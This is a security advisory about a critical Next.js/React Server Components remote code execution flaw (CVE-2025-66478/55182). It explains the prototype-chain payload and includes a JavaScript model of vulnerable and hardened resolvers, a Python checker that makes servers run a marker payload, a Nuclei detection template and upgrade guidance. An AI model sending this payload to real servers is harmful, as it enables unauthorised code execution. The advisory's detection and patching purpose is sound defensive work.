Date: December 4, 2025
Severity: Critical (CVSS 10.0)
Components: Next.js App Router & React Server Components
We are alerting all customers to a critical Remote Code Execution (RCE) vulnerability affecting Next.js applications that use the App Router. The issue, tracked as CVE-2025-66478, stems from an upstream flaw in the React Server Components (RSC) protocol, tracked separately as CVE-2025-55182. The React team has published a blog post with further details. This post walks through a proof-of-concept against the Next.js framework; other frameworks that build on the RSC protocol are also affected.
Our security research team has analyzed the disclosure and successfully validated a working exploit against vulnerable environments. Immediate action is required.
Technical Analysis & Exploit Confirmation
The vulnerability resides in how the React Server Components (RSC) protocol deserializes user input on the server. Any POST request that carries a Next-Action header is routed to the Server Action handler, which decodes the multipart body with the RSC reply deserializer. Because the deserializer trusts the reference strings inside that body, untrusted input can steer how server-side objects are resolved and, ultimately, which server-side logic runs.
We have reviewed and tested the proof-of-concept (PoC) code targeting the upstream React vulnerability. The exploit works by sending a specially crafted POST request with a multipart/form-data payload whose fields contain reference strings that the server resolves against its own internal objects.
The confirmed exploit payload utilizes a prototype-chain traversal vector (commonly described as prototype pollution). The snippet below is based on the confirmed working PoC from GitHub – msanft/CVE-2025-55182 PoC:

# Snippet from confirmed working PoC
files = {
    "0": (None, '{"then":"$1:__proto__:constructor:constructor"}'),
    "1": (None, '{"x":1}'),
}
In our tests, sending this payload to a vulnerable Next.js server makes the deserializer resolve the reference $1:__proto__:constructor:constructor against field 1 ({"x":1}): the lookup walks from that plain object to Object.prototype via __proto__, from there to Object via constructor, and from Object to its own constructor, the global Function constructor. With Function in hand, the attacker can compile and run arbitrary JavaScript within the context of the running server process. Field 0 carries the reference under a key named then, which is why this is referred to below as a "thenable" vector.
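To make the traversal concrete, here is an added example (not React's or Next.js's code, and not from the original post): a deliberately simplified resolver that models how an RSC-style reply deserializer follows a "$<id>:<path>" reference, shown beside a hardened variant that only follows own properties. The function names and the CHUNKS fixture are this example's own assumptions; the real React decoder is considerably more involved.

```javascript
// Added example (not React's or Next.js's code): a simplified model of how an
// RSC-style reply deserializer resolves "$<id>:<path>" references, to show why
// the PoC reference above yields the Function constructor. Function names and
// the CHUNKS fixture are this example's own.

// The two multipart fields from the PoC, keyed by field name, as the
// server-side decoder would receive them (constructed input).
const CHUNKS = {
  "0": '{"then":"$1:__proto__:constructor:constructor"}',
  "1": '{"x":1}',
};

// Split "$1:a:b" into its chunk id and property path; returns null for
// strings that are not references.
function parseReference(ref) {
  if (typeof ref !== "string" || !ref.startsWith("$")) return null;
  const [id, ...path] = ref.slice(1).split(":");
  return { id, path };
}

// Vulnerable model: each path segment is a plain property lookup, so inherited
// properties such as __proto__ and constructor are reachable from any object.
function resolveReference(chunks, ref) {
  const parsed = parseReference(ref);
  if (!parsed) return ref;
  let value = JSON.parse(chunks[parsed.id]);
  for (const key of parsed.path) {
    value = value[key]; // unchecked: happily walks up the prototype chain
  }
  return value;
}

// What an attacker gets from the resolved reference: the global Function
// constructor, which turns any source string into executable server-side code.
function evaluateViaReference(chunks, ref, source) {
  const ctor = resolveReference(chunks, ref);
  if (ctor !== Function) throw new Error("reference did not resolve to Function");
  return ctor(source)(); // on a real server the source would be attacker-chosen
}

// Hardened model: only own properties of decoded objects may be followed.
// JSON.parse creates "__proto__" as an ordinary own property (it does not
// change the prototype), so the hasOwnProperty check keeps that case safe too.
function resolveReferenceHardened(chunks, ref) {
  const parsed = parseReference(ref);
  if (!parsed) return ref;
  if (!Object.prototype.hasOwnProperty.call(chunks, parsed.id)) {
    throw new Error(`unknown chunk ${parsed.id}`);
  }
  let value = JSON.parse(chunks[parsed.id]);
  for (const key of parsed.path) {
    if (value === null || typeof value !== "object") {
      throw new Error(`cannot index into non-object at ${key}`);
    }
    if (!Object.prototype.hasOwnProperty.call(value, key)) {
      throw new Error(`rejected inherited or missing property ${key}`);
    }
    value = value[key];
  }
  return value;
}

// Stand-alone demonstration using the PoC's own reference string.
const pocRef = JSON.parse(CHUNKS["0"]).then;
console.log("vulnerable resolver returns:", resolveReference(CHUNKS, pocRef).name);
console.log("computed through Function:", evaluateViaReference(CHUNKS, pocRef, "return 6 * 7"));
try {
  resolveReferenceHardened(CHUNKS, pocRef);
} catch (e) {
  console.log("hardened resolver:", e.message);
}
```

The vulnerable resolver hands back Function for the PoC reference, and evaluateViaReference shows that a source string of the attacker's choosing then runs in-process; the hardened resolver stops at the first segment that is not an own property.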
The checker below sends a variant of the same payload. Instead of running a full exploit chain, it supplies a code string that only throws a marker error, so a vulnerable server identifies itself in the HTTP response without anything else being executed:

import argparse
import json
import os

import requests

MARKER = "CVE-2025-55182-VULNERABLE"


def check_target(url):
    """Return True if the server echoes the marker error, i.e. it evaluated our code."""
    # Chunk 0 is a "thenable" whose `then` is a reference resolved through the
    # prototype chain. The nested _response/_formData entries steer the
    # deserializer toward the Function constructor (constructor:constructor) so
    # that the `_prefix` string is compiled and run; that string only throws.
    crafted_chunk = {
        "then": "$1:__proto__:then",
        "status": "resolved_model",
        "reason": -1,
        "value": '{"then": "$B0"}',
        "_response": {
            "_prefix": f"throw new Error('{MARKER}');",
            "_formData": {
                "get": "$1:constructor:constructor",
            },
        },
    }
    files = {
        "0": (None, json.dumps(crafted_chunk)),
        "1": (None, '"$@0"'),  # chunk 1 is a reference back to chunk 0
    }
    try:
        # Any value in Next-Action routes the request to the Server Action handler.
        res = requests.post(url, files=files, headers={"Next-Action": "x"}, timeout=10)
    except requests.RequestException as exc:
        print(f"[ERROR] {url}: {exc}")
        return False
    if MARKER in res.text:
        print(f"[VULNERABLE] {url}")
        return True
    print(f"[NOT VULNERABLE] {url} (HTTP {res.status_code})")
    return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-55182 vulnerability checker")
    parser.add_argument("target", help="URL or file containing URLs (one per line)")
    args = parser.parse_args()
    if os.path.isfile(args.target):
        with open(args.target) as f:
            urls = [line.strip() for line in f if line.strip()]
    else:
        urls = [args.target]
    for url in urls:
        check_target(url)
Vulnerability Detection (Nuclei Template)
To assist security teams in identifying vulnerable instances, we have developed a high-fidelity Nuclei template.
Unlike generic scanners, this template mimics the specific “thenable” prototype-chain vector used in the working exploit. It looks for an HTTP 500 whose body carries the RSC error-chunk signature (E{"digest") produced when the deserializer chokes on the malicious reference. Treat a match as a strong indicator that the RSC deserializer processed the payload, not as proof of exploitability; confirm with the checker script above before escalating.
Save the following as CVE-2025-66478.yaml:
id: CVE-2025-66478-RCE

info:
  name: Next.js App Router / RSC - Prototype Pollution RCE
  author: Praetorian, Co-Authored with Gemini
  severity: critical
  description: |
    Detects the Next.js/React Server Components RCE (CVE-2025-66478 / CVE-2025-55182).
    The template sends a malicious payload containing a "thenable" object targeting
    the prototype chain. A 500 error combined with a specific RSC error digest
    indicates the insecure deserializer is present and attempted to process the payload.
  reference:
    - https://nextjs.org/blog/CVE-2025-66478
  tags: cve,cve2025,nextjs,rce

variables:
  boundary: "----WebKitFormBoundary7MA4YWxkTrZu0gW"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Next-Action: 409defd89dd31eeb200d9ea02b1f325d25f5f5f3f0
        Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%2Cnull%2Cnull%5D%7D%2Cnull%2Cnull%2Ctrue%5D
        Content-Type: multipart/form-data; boundary={{boundary}}

        --{{boundary}}
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:constructor:constructor"}
        --{{boundary}}
        Content-Disposition: form-data; name="1"

        {"x":1}
        --{{boundary}}--

    matchers-condition: and
    matchers:
      # We expect a 500 because the payload is malicious but incomplete for full execution
      # in a scanning context, causing the parser to choke on the prototype access.
      - type: status
        status:
          - 500
      # This confirms the error came from the React Server Components runtime
      - type: word
        part: body
        words:
          - 'E{"digest"'
      # Negative matcher to reduce false positives from standard 404s
      # (redundant with the 500 check under matchers-condition: and, kept as a guard)
      - type: status
        status:
          - 404
        negative: true
Affected Versions
This vulnerability affects applications using the App Router in the following versions:
- Next.js 15.x
- Next.js 16.x
- Next.js 14.3.0-canary.77 and later canary releases
Note: Next.js 13.x, Next.js 14.x (stable), Pages Router applications, and the Edge Runtime are NOT affected.
Remediation Guidelines
There are no configuration workarounds available (such as disabling specific flags). You must upgrade the next package to a patched version immediately.
1. Identify your current version: check your package.json or, better, run npm list next, since the resolved version in your lockfile is what is actually installed and may be older than the range declared in package.json.
2. Upgrade to a fixed version: update to the patched release for your minor version line:
- For Next.js 15.0.x: npm install next@15.0.5
- For Next.js 15.1.x: npm install next@15.1.9
- For Next.js 15.2.x: npm install next@15.2.6
- For Next.js 15.3.x: npm install next@15.3.6
- For Next.js 15.4.x: npm install next@15.4.8
- For Next.js 15.5.x: npm install next@15.5.7
- For Next.js 16.0.x: npm install next@16.0.7
3. Downgrade if on Canary: if you are using a vulnerable canary version (14.3.0-canary.77 or later), downgrade to the latest stable Next.js 14 release:
npm install next@14
After upgrading, redeploy and re-run the checker script or the Nuclei template against the deployed application to confirm the fix took effect.
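As an added example (not Next.js tooling and not code from the original post), the script below encodes the affected ranges and patched releases listed above as a version classifier, handles the 14.x canary edge case, and reads the resolved version from a package-lock.json rather than trusting the package.json range. The function names and the sample lockfile are this example's own; the fixed-version table is copied from the remediation list.

```javascript
// Added example (not Next.js tooling): classify an installed `next` version
// against the affected ranges and patched releases listed in this advisory.
// The fixed-version table comes from the remediation list above; the parsing,
// comparison and lockfile-reading logic is this example's own.

// Lowest patched release for each affected minor line (from the advisory).
const FIXED_VERSIONS = {
  "15.0": "15.0.5",
  "15.1": "15.1.9",
  "15.2": "15.2.6",
  "15.3": "15.3.6",
  "15.4": "15.4.8",
  "15.5": "15.5.7",
  "16.0": "16.0.7",
};

// First affected canary build on the 14 line (from the advisory).
const FIRST_BAD_CANARY = { core: "14.3.0", build: 77 };

// Parse "MAJOR.MINOR.PATCH[-prerelease]" (optional leading "v").
function parseVersion(text) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(text).trim());
  if (!m) throw new Error(`unparseable version: ${text}`);
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null };
}

// Compare MAJOR.MINOR.PATCH only; prerelease tags are handled by the caller.
function compareCore(a, b) {
  return a.major - b.major || a.minor - b.minor || a.patch - b.patch;
}

// Returns { version, status, advice } with status one of
// "not-affected", "vulnerable", "patched" or "unknown".
function assessNextVersion(text) {
  const v = parseVersion(text);
  const result = (status, advice) => ({ version: text, status, advice });

  // 14.x canaries: 14.3.0-canary.77 and later are affected.
  if (v.major === 14 && v.pre && v.pre.startsWith("canary.")) {
    const build = parseInt(v.pre.slice("canary.".length), 10);
    const cmp = compareCore(v, parseVersion(FIRST_BAD_CANARY.core));
    const affected = cmp > 0 || (cmp === 0 && build >= FIRST_BAD_CANARY.build);
    return affected
      ? result("vulnerable", "Downgrade to the latest stable Next.js 14: npm install next@14")
      : result("not-affected", "Canary build predates 14.3.0-canary.77");
  }

  // 13.x and stable 14.x are listed as not affected.
  if (v.major < 15) {
    return result("not-affected", "Next.js 13.x and stable 14.x are not affected");
  }

  const line = `${v.major}.${v.minor}`;
  const fixed = FIXED_VERSIONS[line];
  if (!fixed) {
    return result("unknown", `No patched release listed for the ${line}.x line; consult the upstream advisory`);
  }

  // Below the fixed patch, or a prerelease of the fixed patch itself, is vulnerable.
  const cmp = compareCore(v, parseVersion(fixed));
  if (cmp < 0 || (cmp === 0 && v.pre)) {
    return result("vulnerable", `Upgrade: npm install next@${fixed}`);
  }
  return result("patched", `Already at ${fixed} or later on the ${line}.x line`);
}

// Read the resolved `next` version from a package-lock.json (lockfileVersion 2/3
// layout); the lockfile, not the package.json range, is what actually installs.
function assessLockfile(lockJson) {
  const lock = JSON.parse(lockJson);
  const entry = lock.packages && lock.packages["node_modules/next"];
  if (!entry || !entry.version) throw new Error("next not found in lockfile");
  return assessNextVersion(entry.version);
}

// Constructed sample lockfile fragment for the stand-alone run.
const SAMPLE_LOCK = JSON.stringify({
  name: "example-app",
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { next: "^15.3.0" } },
    "node_modules/next": { version: "15.3.2" },
  },
});

for (const v of ["15.3.2", "15.3.6", "16.0.7", "14.2.15", "14.3.0-canary.80", "13.5.6"]) {
  console.log(v, "=>", assessNextVersion(v));
}
console.log("lockfile =>", assessLockfile(SAMPLE_LOCK));
```

The sample lockfile declares ^15.3.0 but resolves to 15.3.2, which is exactly the case where reading package.json alone would miss a vulnerable install; minor lines the advisory does not list come back as "unknown" rather than being silently treated as safe.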
References
- Official Security Advisory: Next.js Blog – CVE-2025-66478 (https://nextjs.org/blog/CVE-2025-66478)
- Confirmed Exploit Analysis: GitHub – msanft/CVE-2025-55182 PoC